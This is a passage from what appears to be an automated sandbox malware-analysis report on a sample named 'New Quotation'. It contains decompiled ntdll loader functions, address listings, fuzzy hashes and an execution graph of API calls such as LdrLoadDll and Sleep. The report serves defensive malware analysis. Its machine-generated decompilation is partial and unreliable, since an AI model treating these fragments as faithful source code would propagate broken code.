																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1d8c37c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}





























                                                                                                                                                                                          0x1d804b79
                                                                                                                                                                                          0x1d804b86
                                                                                                                                                                                          0x1d804b88
                                                                                                                                                                                          0x1d804b8e
                                                                                                                                                                                          0x1d804b90
                                                                                                                                                                                          0x1d804b93
                                                                                                                                                                                          0x1d804b97
                                                                                                                                                                                          0x1d804c27
                                                                                                                                                                                          0x1d804c35
                                                                                                                                                                                          0x1d804ba7
                                                                                                                                                                                          0x1d804ba7
                                                                                                                                                                                          0x1d804baa
                                                                                                                                                                                          0x1d804bac
                                                                                                                                                                                          0x1d804bb2
                                                                                                                                                                                          0x1d804bb2
                                                                                                                                                                                          0x1d804bb5
                                                                                                                                                                                          0x1d804bbc
                                                                                                                                                                                          0x1d84330f
                                                                                                                                                                                          0x1d843316
                                                                                                                                                                                          0x1d843317
                                                                                                                                                                                          0x1d84331e
                                                                                                                                                                                          0x1d843321
                                                                                                                                                                                          0x1d843324
                                                                                                                                                                                          0x1d843327
                                                                                                                                                                                          0x1d84332a
                                                                                                                                                                                          0x1d843331
                                                                                                                                                                                          0x1d843334
                                                                                                                                                                                          0x1d843339
                                                                                                                                                                                          0x1d84333e
                                                                                                                                                                                          0x1d84333e
                                                                                                                                                                                          0x1d804bca
                                                                                                                                                                                          0x1d843344
                                                                                                                                                                                          0x1d84334b
                                                                                                                                                                                          0x1d84334c
                                                                                                                                                                                          0x1d843353
                                                                                                                                                                                          0x1d843356
                                                                                                                                                                                          0x1d84335d
                                                                                                                                                                                          0x1d843360
                                                                                                                                                                                          0x1d843363
                                                                                                                                                                                          0x1d84336a
                                                                                                                                                                                          0x1d84336d
                                                                                                                                                                                          0x1d843372
                                                                                                                                                                                          0x1d843372
                                                                                                                                                                                          0x1d804bd0
                                                                                                                                                                                          0x1d804bd5
                                                                                                                                                                                          0x1d804c36
                                                                                                                                                                                          0x1d804c36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804bd7
                                                                                                                                                                                          0x1d804bd7
                                                                                                                                                                                          0x1d804bd7
                                                                                                                                                                                          0x1d804bdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804be1
                                                                                                                                                                                          0x1d804be3
                                                                                                                                                                                          0x1d804bec
                                                                                                                                                                                          0x1d804bef
                                                                                                                                                                                          0x1d804bf0
                                                                                                                                                                                          0x1d804bf9
                                                                                                                                                                                          0x1d804bfd
                                                                                                                                                                                          0x1d804bff
                                                                                                                                                                                          0x1d804c04
                                                                                                                                                                                          0x1d804c06
                                                                                                                                                                                          0x1d804c07
                                                                                                                                                                                          0x1d804c0a
                                                                                                                                                                                          0x1d804c0c
                                                                                                                                                                                          0x1d804c0f
                                                                                                                                                                                          0x1d804c1a
                                                                                                                                                                                          0x1d804c1c
                                                                                                                                                                                          0x1d804c21
                                                                                                                                                                                          0x1d84337a
                                                                                                                                                                                          0x1d84337a
                                                                                                                                                                                          0x1d84337d
                                                                                                                                                                                          0x1d84337d
                                                                                                                                                                                          0x1d843384
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d843386
                                                                                                                                                                                          0x1d843386
                                                                                                                                                                                          0x1d84338b
                                                                                                                                                                                          0x1d8433b2
                                                                                                                                                                                          0x1d8433b5
                                                                                                                                                                                          0x1d8433b9
                                                                                                                                                                                          0x1d8433be
                                                                                                                                                                                          0x1d8433f7
                                                                                                                                                                                          0x1d8433f7
                                                                                                                                                                                          0x1d804c76
                                                                                                                                                                                          0x1d804c84
                                                                                                                                                                                          0x1d804c8c
                                                                                                                                                                                          0x1d804c90
                                                                                                                                                                                          0x1d804ca9
                                                                                                                                                                                          0x1d804ca9
                                                                                                                                                                                          0x1d804cae
                                                                                                                                                                                          0x1d804ce4
                                                                                                                                                                                          0x1d804cee
                                                                                                                                                                                          0x1d804cf3
                                                                                                                                                                                          0x1d804cf3
                                                                                                                                                                                          0x1d804ce6
                                                                                                                                                                                          0x1d804ce6
                                                                                                                                                                                          0x1d804cb2
                                                                                                                                                                                          0x1d843463
                                                                                                                                                                                          0x1d84347b
                                                                                                                                                                                          0x1d843480
                                                                                                                                                                                          0x1d84348a
                                                                                                                                                                                          0x1d843490
                                                                                                                                                                                          0x1d843490
                                                                                                                                                                                          0x1d84348a
                                                                                                                                                                                          0x1d804cbe
                                                                                                                                                                                          0x1d804c92
                                                                                                                                                                                          0x1d804c98
                                                                                                                                                                                          0x1d804cc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d843423
                                                                                                                                                                                          0x1d843429
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84342f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84342f
                                                                                                                                                                                          0x1d843429
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804c9a
                                                                                                                                                                                          0x1d804c9a
                                                                                                                                                                                          0x1d804ca1
                                                                                                                                                                                          0x1d843434
                                                                                                                                                                                          0x1d843435
                                                                                                                                                                                          0x1d84344f
                                                                                                                                                                                          0x1d843454
                                                                                                                                                                                          0x1d843454
                                                                                                                                                                                          0x1d804ca7
                                                                                                                                                                                          0x1d804ca7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804c98
                                                                                                                                                                                          0x1d843391
                                                                                                                                                                                          0x1d843398
                                                                                                                                                                                          0x1d84339c
                                                                                                                                                                                          0x1d8433a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8433a2
                                                                                                                                                                                          0x1d84338b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8433a7
                                                                                                                                                                                          0x1d8433a7
                                                                                                                                                                                          0x1d8433a9
                                                                                                                                                                                          0x1d8433ad
                                                                                                                                                                                          0x1d804c21
                                                                                                                                                                                          0x1d804c1a
                                                                                                                                                                                          0x1d804c04
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804bfd
                                                                                                                                                                                          0x1d804bdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804bd5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804bac
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0$Flst
                                                                                                                                                                                          • API String ID: 0-758220159
                                                                                                                                                                                          • Opcode ID: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                                                                                                                                          • Instruction ID: d0e735231799c211d633c8d0fea366b830a7a91c94e10d83c2b94804be2dfb18
                                                                                                                                                                                          • Opcode Fuzzy Hash: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28519AB1E40699DFDB15CF9CC9847A9FBF4EF44719F25C02AE0499B250E7B09981CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E1D7D0485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x1d8c6630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E1D7D82E0(0xabababab, 0, "kLsE", 0);
					 *0x1d8c6630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E1D7F5C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E1D7D0670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E1D7D0670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E1D7D0630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E1D815050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push("true");
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E1D813EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E1D7D0690) {
					 *0x1d8c91e0();
					_t50 =  *_t73();
				} else {
					_t50 = E1D7D0690();
				}
				_t84 = _t50;
				goto L4;
			}


















                                                                                                                                                                                          0x1d7d048f
                                                                                                                                                                                          0x1d7d0493
                                                                                                                                                                                          0x1d7d049a
                                                                                                                                                                                          0x1d7d04a0
                                                                                                                                                                                          0x1d7d04a3
                                                                                                                                                                                          0x1d7d04a6
                                                                                                                                                                                          0x1d7d04af
                                                                                                                                                                                          0x1d7d04b8
                                                                                                                                                                                          0x1d7d04c2
                                                                                                                                                                                          0x1d7d04cb
                                                                                                                                                                                          0x1d7d04ce
                                                                                                                                                                                          0x1d7d04d2
                                                                                                                                                                                          0x1d7d04d6
                                                                                                                                                                                          0x1d7d060e
                                                                                                                                                                                          0x1d7d0610
                                                                                                                                                                                          0x1d7d0618
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d04ef
                                                                                                                                                                                          0x1d7d04ef
                                                                                                                                                                                          0x1d7d04f2
                                                                                                                                                                                          0x1d7d05e3
                                                                                                                                                                                          0x1d7d05ea
                                                                                                                                                                                          0x1d7d05f1
                                                                                                                                                                                          0x1d7d05f1
                                                                                                                                                                                          0x1d7d0501
                                                                                                                                                                                          0x1d7d0501
                                                                                                                                                                                          0x1d7d0504
                                                                                                                                                                                          0x1d7d050c
                                                                                                                                                                                          0x1d7d0519
                                                                                                                                                                                          0x1d7d051b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e99c
                                                                                                                                                                                          0x1d82e9a2
                                                                                                                                                                                          0x1d82e9ac
                                                                                                                                                                                          0x1d7d051f
                                                                                                                                                                                          0x1d7d052a
                                                                                                                                                                                          0x1d82e9b9
                                                                                                                                                                                          0x1d7d05cd
                                                                                                                                                                                          0x1d7d05d3
                                                                                                                                                                                          0x1d7d05d3
                                                                                                                                                                                          0x1d82e9bf
                                                                                                                                                                                          0x1d7d053c
                                                                                                                                                                                          0x1d7d054d
                                                                                                                                                                                          0x1d7d0559
                                                                                                                                                                                          0x1d7d0562
                                                                                                                                                                                          0x1d82e9ce
                                                                                                                                                                                          0x1d82e9ce
                                                                                                                                                                                          0x1d7d056a
                                                                                                                                                                                          0x1d7d057b
                                                                                                                                                                                          0x1d7d0580
                                                                                                                                                                                          0x1d7d0580
                                                                                                                                                                                          0x1d7d058f
                                                                                                                                                                                          0x1d7d0597
                                                                                                                                                                                          0x1d7d0598
                                                                                                                                                                                          0x1d7d059d
                                                                                                                                                                                          0x1d7d05a1
                                                                                                                                                                                          0x1d7d05a5
                                                                                                                                                                                          0x1d7d05ad
                                                                                                                                                                                          0x1d7d05b3
                                                                                                                                                                                          0x1d82e9dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e9ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e9ed
                                                                                                                                                                                          0x1d82e9dd
                                                                                                                                                                                          0x1d7d05b9
                                                                                                                                                                                          0x1d7d05be
                                                                                                                                                                                          0x1d7d05c7
                                                                                                                                                                                          0x1d82e9f2
                                                                                                                                                                                          0x1d82e9f2
                                                                                                                                                                                          0x1d7d05c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d05ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e9b2
                                                                                                                                                                                          0x1d7d050c
                                                                                                                                                                                          0x1d7d04fb
                                                                                                                                                                                          0x1d82e989
                                                                                                                                                                                          0x1d82e990
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e990
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d04fb
                                                                                                                                                                                          0x1d7d04dc
                                                                                                                                                                                          0x1d7d04e2
                                                                                                                                                                                          0x1d7d05d6
                                                                                                                                                                                          0x1d7d05dc
                                                                                                                                                                                          0x1d7d04e8
                                                                                                                                                                                          0x1d7d04e8
                                                                                                                                                                                          0x1d7d04e8
                                                                                                                                                                                          0x1d7d04ed
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • kLsE, xrefs: 1D7D05FE
                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D7D0586
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                                                                                          • Opcode ID: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                                                                                                                                          • Instruction ID: 3d8fe6405c4641e948450925d63f5ee32b424cc2187ed1fab7f15cefc90602c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F51CD75A00B56DFC792DFA5C485AAAB7F4AF44360F00943EDA9A83240E774A544CBA3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                          			E1D7CDF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d8cb370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1D818F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push("true");
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L1D7E2330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1D7E24D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1d8c91e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1D814B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                                                                                                          0x1d7cdf21
                                                                                                                                                                                          0x1d7cdf29
                                                                                                                                                                                          0x1d7cdf33
                                                                                                                                                                                          0x1d7cdf3b
                                                                                                                                                                                          0x1d7cdf40
                                                                                                                                                                                          0x1d7cdf44
                                                                                                                                                                                          0x1d7cdf46
                                                                                                                                                                                          0x1d7cdf52
                                                                                                                                                                                          0x1d7cdf56
                                                                                                                                                                                          0x1d7cdf5b
                                                                                                                                                                                          0x1d7cdf5e
                                                                                                                                                                                          0x1d7cdf61
                                                                                                                                                                                          0x1d7cdf65
                                                                                                                                                                                          0x1d7cdf67
                                                                                                                                                                                          0x1d7ce058
                                                                                                                                                                                          0x1d7ce05a
                                                                                                                                                                                          0x1d7ce05d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cdf6d
                                                                                                                                                                                          0x1d7cdf6d
                                                                                                                                                                                          0x1d7cdf70
                                                                                                                                                                                          0x1d82d6ea
                                                                                                                                                                                          0x1d82d6f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d7cdf76
                                                                                                                                                                                          0x1d7cdf76
                                                                                                                                                                                          0x1d7cdf78
                                                                                                                                                                                          0x1d7cdf78
                                                                                                                                                                                          0x1d7cdf79
                                                                                                                                                                                          0x1d7cdf80
                                                                                                                                                                                          0x1d7ce019
                                                                                                                                                                                          0x1d7ce024
                                                                                                                                                                                          0x1d7ce02c
                                                                                                                                                                                          0x1d7ce032
                                                                                                                                                                                          0x1d7ce03b
                                                                                                                                                                                          0x1d7ce045
                                                                                                                                                                                          0x1d7ce04b
                                                                                                                                                                                          0x1d7ce04e
                                                                                                                                                                                          0x1d7ce04e
                                                                                                                                                                                          0x1d7cdf8d
                                                                                                                                                                                          0x1d7cdf91
                                                                                                                                                                                          0x1d7cdf94
                                                                                                                                                                                          0x1d7cdf99
                                                                                                                                                                                          0x1d7cdfa0
                                                                                                                                                                                          0x1d7cdfab
                                                                                                                                                                                          0x1d7cdfb3
                                                                                                                                                                                          0x1d7cdfb7
                                                                                                                                                                                          0x1d7cdfbb
                                                                                                                                                                                          0x1d7cdfbc
                                                                                                                                                                                          0x1d7cdfc0
                                                                                                                                                                                          0x1d7cdfc8
                                                                                                                                                                                          0x1d7cdfc9
                                                                                                                                                                                          0x1d7cdfca
                                                                                                                                                                                          0x1d7cdfcd
                                                                                                                                                                                          0x1d7cdfe0
                                                                                                                                                                                          0x1d7cdfea
                                                                                                                                                                                          0x1d7cdfea
                                                                                                                                                                                          0x1d7cdfec
                                                                                                                                                                                          0x1d7cdfec
                                                                                                                                                                                          0x1d7cdf70
                                                                                                                                                                                          0x1d7cdff2
                                                                                                                                                                                          0x1d7cdff3
                                                                                                                                                                                          0x1d7cdff4
                                                                                                                                                                                          0x1d7cdfff

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: 0$0
                                                                                                                                                                                          • API String ID: 3446177414-203156872
                                                                                                                                                                                          • Opcode ID: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                                                                                                                                          • Instruction ID: 046575b892da7dd237c71d30421070ca1e84f9b997c7e9b21b1efb3b3dbd7879
                                                                                                                                                                                          • Opcode Fuzzy Hash: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D4169B16087429FC301CF2CC484A5ABBE4BB89724F044A6EF588DB340D771EA05CB86
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:1.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:590
                                                                                                                                                                                          Total number of Limit Nodes:66
                                                                                                                                                                                          execution_graph 84361 32129f0 LdrInitializeThunk 84362 729080 84365 7290bb 84362->84365 84382 72bd40 84362->84382 84364 72919c 84365->84364 84373 71acf0 84365->84373 84369 729120 Sleep 84370 72910d 84369->84370 84370->84364 84370->84369 84385 728ca0 LdrLoadDll 84370->84385 84386 728eb0 LdrLoadDll 84370->84386 84374 71ad14 84373->84374 84375 71ad50 LdrLoadDll 84374->84375 84376 71ad1b 84374->84376 84375->84376 84377 724e50 84376->84377 84378 724e5e 84377->84378 84379 724e6a 84377->84379 84378->84379 84387 7252d0 LdrLoadDll 84378->84387 84379->84370 84381 724fbc 84381->84370 84388 72a540 84382->84388 84385->84370 84386->84370 84387->84381 84391 72af60 84388->84391 84390 72a55c 84390->84365 84392 72af70 84391->84392 84394 72af92 84391->84394 84393 724e50 LdrLoadDll 84392->84393 84393->84394 84394->84390 84395 72f12d 84398 72b9d0 84395->84398 84399 72b9f6 84398->84399 84406 719d40 84399->84406 84401 72ba02 84402 72ba26 84401->84402 84414 718f30 84401->84414 84452 72a6b0 84402->84452 84455 719c90 84406->84455 84408 719d4d 84409 719d54 84408->84409 84467 719c30 84408->84467 84409->84401 84415 718f57 84414->84415 84864 71b1c0 84415->84864 84417 718f69 84868 71af10 84417->84868 84419 718f86 84426 718f8d 84419->84426 84939 71ae40 LdrLoadDll 84419->84939 84422 718ffc 84884 71f410 84422->84884 84424 719006 84425 72bf90 2 API calls 84424->84425 84448 7190f2 84424->84448 84427 71902a 84425->84427 84426->84448 84872 71f380 84426->84872 84428 72bf90 2 API calls 84427->84428 84429 71903b 84428->84429 84430 72bf90 2 API calls 84429->84430 84431 71904c 84430->84431 84896 71ca90 84431->84896 84433 719059 84434 724a50 8 API calls 84433->84434 84435 719066 84434->84435 84436 724a50 8 API calls 84435->84436 84437 719077 84436->84437 84438 7190a5 84437->84438 84439 719084 84437->84439 84441 724a50 8 API calls 84438->84441 84906 71d620 84439->84906 84447 7190c1 84441->84447 84444 7190e9 84445 718d00 21 API calls 84444->84445 84445->84448 84446 719092 84922 718d00 84446->84922 84447->84444 84940 71d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84447->84940 84448->84402 84453 72af60 LdrLoadDll 84452->84453 84454 72a6cf 84453->84454 84486 728bc0 84455->84486 84459 719cb6 84459->84408 84460 719cac 84460->84459 84493 72b2b0 84460->84493 84462 719cf3 84462->84459 84504 719ab0 84462->84504 84464 719d13 84510 719620 LdrLoadDll 84464->84510 84466 719d25 84466->84408 84843 72b5a0 84467->84843 84470 72b5a0 LdrLoadDll 84471 719c5b 84470->84471 84472 72b5a0 LdrLoadDll 84471->84472 84473 719c71 84472->84473 84474 71f180 84473->84474 84475 71f199 84474->84475 84847 71b040 84475->84847 84477 71f1ac 84851 72a1e0 84477->84851 84480 719d65 84480->84401 84482 71f1d2 84483 71f1fd 84482->84483 84857 72a260 84482->84857 84485 72a490 2 API calls 84483->84485 84485->84480 84487 728bcf 84486->84487 84488 724e50 LdrLoadDll 84487->84488 84489 719ca3 84488->84489 84490 728a70 84489->84490 84511 72a600 84490->84511 84494 72b2c9 84493->84494 84514 724a50 84494->84514 84496 72b2e1 84497 72b2ea 84496->84497 84553 72b0f0 84496->84553 84497->84462 84499 72b2fe 84499->84497 84571 729f00 84499->84571 84821 717ea0 84504->84821 84506 719ad1 84506->84464 84507 719aca 84507->84506 84834 718160 84507->84834 84510->84466 84512 72af60 LdrLoadDll 84511->84512 84513 728a85 84512->84513 84513->84460 84515 724d85 84514->84515 84516 724a64 84514->84516 84515->84496 84516->84515 84579 729c50 84516->84579 84519 724b73 84639 72a460 LdrLoadDll 84519->84639 84520 724b90 84582 72a360 84520->84582 84523 724bb7 84525 72bdc0 2 API calls 84523->84525 84524 724b7d 84524->84496 84527 724bc3 84525->84527 84526 724d49 84529 72a490 2 API calls 84526->84529 84527->84524 84527->84526 84528 724d5f 84527->84528 84533 724c52 84527->84533 84648 724790 LdrLoadDll NtReadFile NtClose 84528->84648 84531 724d50 84529->84531 84531->84496 84532 724d72 84532->84496 84534 724cb9 84533->84534 84536 724c61 84533->84536 84534->84526 84535 724ccc 84534->84535 84641 72a2e0 84535->84641 84538 724c66 84536->84538 84539 724c7a 84536->84539 84640 724650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84538->84640 84542 724c97 84539->84542 84543 724c7f 84539->84543 84542->84531 84597 724410 84542->84597 